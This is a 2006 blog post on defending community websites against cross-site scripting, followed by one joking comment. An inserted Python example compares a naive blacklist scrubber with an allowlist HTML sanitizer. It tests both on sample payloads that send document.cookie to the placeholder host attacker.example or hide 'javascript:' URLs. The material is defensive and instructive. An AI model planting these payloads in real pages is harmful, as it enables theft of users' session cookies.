Thursday, November 09

Geek

INXSS

My current headache is cross-site scripting, or XSS.

Cross-site scripting is an unforeseen product of the combination of browser programmability and communally-updated websites. JavaScript and XMLHttpRequest let your browser do all sorts of nifty things; community web sites let people build really nifty things; together they let bad people steal your ID.

Anyone can create a web page with script that reads your cookies, but browsers aren't stupid: script on a page only gets the cookies belonging to the site that served the page. Which was not a problem in the past, because before anyone could do anything untoward on your site they had to take control of it by some other means.

But on a community site where anyone can post unfiltered HTML, the attacker's script is served from your site, so the browser happily hands it your users' cookies for that site. Badness.

The approaches to this problem seem to be threefold:

1. The listen-to-nanny approach, as typified by CERT: Tell people to turn off Javascript, and not to browse unknown web sites, especially after dark.

2. The patch-it-and-hope approach: Scrub the HTML for any untoward JavaScript. If your site can restrict what users put up on their pages, you may be able to eliminate JavaScript altogether - though even then, you might get tripped up the way MySpace was (its filter stripped the word "javascript" and the obvious tags, and the Samy worm got through with a "java\nscript:" URL inside a CSS style attribute, which the browser quietly joined back together).

3. The keep-the-doors-and-windows-locked approach: Don't use cookies that give users global access, so that a stolen cookie buys the thief very little. I think Blogger may be doing this, and that's why you keep having to log in to comment.

You have to do some of 2 in any case. If you don't scrub comments of bad HTML, you will find your page layouts corrupted in very short order; a scrubber that throws away everything except a short list of known-safe tags, attributes and URL schemes holds up far better than one that hunts for known-bad ones, because there is always one more way to spell "javascript". 3 looks likely to be the most robust, but at the cost of user functionality. A related trick is to mark the session cookie so the browser never hands it to script at all (the HttpOnly cookie flag, where the browser honours it); a cookie thief then needs more than document.cookie.
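As an added example (not Minx's code, nor anything from the post), here is what approach 2 has to contend with, in Python using only the standard library: a few constructed cookie-stealing payloads of the kind a comment box might receive, each shipping document.cookie off to an attacker-controlled host (attacker.example is a placeholder), run through a naive blacklist scrubber and then through an allowlist sanitizer that keeps only a short list of tags, attributes and URL schemes. The tag vocabulary is an assumption chosen for a blog comment field; the "java\nscript:" and entity-encoded payloads are the MySpace-style tricks that beat blacklists.

```python
# Added example, not Minx's code nor any other site's: why scrubbing for
# "<script>" is not enough, and what an allowlist sanitizer for user HTML
# looks like. Standard library only. ALLOWED_* and PAYLOADS are constructed
# for illustration; attacker.example is a placeholder host.
import re
from html import escape
from html.parser import HTMLParser

ALLOWED_TAGS = {"p", "b", "i", "em", "strong", "a", "blockquote", "br", "code", "pre"}
ALLOWED_ATTRS = {"a": {"href", "title"}}      # no style=, no on*= anywhere
ALLOWED_SCHEMES = {"http", "https", "mailto"}
DROP_WITH_CONTENT = {"script", "style"}       # the tag *and* its text go
VOID_TAGS = {"br"}


def naive_scrub(html):
    """Approach 2 done badly: blacklist the one obvious tag."""
    return re.sub(r"<\s*/?\s*script[^>]*>", "", html, flags=re.I)


def safe_url(url):
    """Allow only known-harmless schemes. Whitespace and control characters
    are removed before the check because browsers ignore them inside the
    scheme: a "java\\nscript:" URL is how the Samy worm got past MySpace."""
    cleaned = re.sub(r"[\x00-\x20]", "", url).lower()
    if ":" not in cleaned:
        return True                           # relative URL, no scheme
    return cleaned.split(":", 1)[0] in ALLOWED_SCHEMES


class Allowlist(HTMLParser):
    """Re-emit only allowed tags and attributes; everything else becomes plain
    text (or vanishes, for script/style). The output is always balanced."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.open, self.skipping = [], [], None

    def handle_starttag(self, tag, attrs):
        if self.skipping:
            return
        if tag in DROP_WITH_CONTENT:
            self.skipping = tag
            return
        if tag not in ALLOWED_TAGS:
            return                            # drop the tag, keep its text
        kept = []
        for name, value in attrs:             # names lowercased, entities decoded by the parser
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue                      # this is what kills onerror=, style=, ...
            if name == "href" and not safe_url(value or ""):
                continue
            kept.append(f' {name}="{escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self.open.append(tag)

    def handle_endtag(self, tag):
        if self.skipping:
            if tag == self.skipping:
                self.skipping = None
            return
        if tag in self.open:                  # also closes anything left open inside it
            while self.open:
                t = self.open.pop()
                self.out.append(f"</{t}>")
                if t == tag:
                    break

    def handle_data(self, data):
        if not self.skipping:
            self.out.append(escape(data, quote=False))

    def result(self):
        self.close()                          # flush the parser's buffers
        while self.open:                      # close whatever the user forgot
            self.out.append(f"</{self.open.pop()}>")
        return "".join(self.out)


def sanitize(html):
    parser = Allowlist()
    parser.feed(html)
    return parser.result()


# Constructed payloads: each tries to send document.cookie to the attacker.
PAYLOADS = [
    '<script>new Image().src="http://attacker.example/?c="+document.cookie</script>',
    '<img src=x onerror="new Image().src=\'http://attacker.example/?c=\'+document.cookie">',
    '<a href="java\nscript:alert(document.cookie)">click</a>',
    '<a href="&#106;avascript:alert(document.cookie)">hi</a>',
    '<div style="background:url(\'java\nscript:eval(document.cookie)\')">samy</div>',
]

if __name__ == "__main__":
    for p in PAYLOADS:
        print("naive    :", naive_scrub(p))
        print("allowlist:", sanitize(p))
```

The blacklist leaves the onerror= handler and both javascript: URLs untouched; the allowlist reduces every payload to harmless text or nothing, keeps the links (minus their dangerous href), and still lets `<b>`, `<a href="http://...">` and friends through for ordinary commenters.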

Anyone know of any in-depth resources on this? Or are people keeping their solutions close to their chests?

Posted by: Pixy Misa at 07:09 AM

1 ( usenet oldbie )
HTML in posts is Evil!

That, and top posting.

Die, HTML, Die!
( /usenet oldbie )

Posted by: Kristopher at Thursday, November 09 2006 12:00 PM (giy+l)

